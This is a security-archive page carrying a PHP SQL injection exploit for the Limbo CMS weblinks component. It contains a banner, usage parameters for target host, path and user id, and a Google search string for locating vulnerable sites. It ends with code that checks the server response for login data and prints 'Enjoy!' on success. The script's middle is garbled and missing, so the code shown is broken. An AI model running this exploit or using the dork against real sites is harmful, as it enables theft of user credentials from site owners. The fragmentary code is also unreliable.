TUCoPS :: Web :: CMS / Portals :: b06-2061.htm

Limbo CMS (option=weblinks) SQL injection exploit
Limbo CMS (option=weblinks) SQL injection exploit
Limbo CMS (option=weblinks) SQL injection exploit



=0D
[i] Limbo CMS (option=weblinks) sql injection exploit=0D
[i] Cyber-Security.ORG | Security Advisory | Security Edithor by SnoB | Turkish hacking | security{!}=0D
	=0D
[*] Usage: ?host=[hostname]&path=[limbo_path]&id=[user_id]=0D
[*] Exemple: ?host=127.0.0.1&path=/limbo&id=1=0D
=0D
[g] Google: inurl:"index2.php?option=rss" OR "powered By Limbo CMS"	=0D
/",$f)) && (preg_match("/login/",$f)) )=0D
       {=0D
			echo "$f";=0D
			echo "[+] Enjoy! :>
";=0D $success = 1;=0D }=0D }=0D fclose($fp);=0D =0D if (!$success)=0D echo "
[-] exploit failed :<
";=0D }=0D ?> =0D
=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH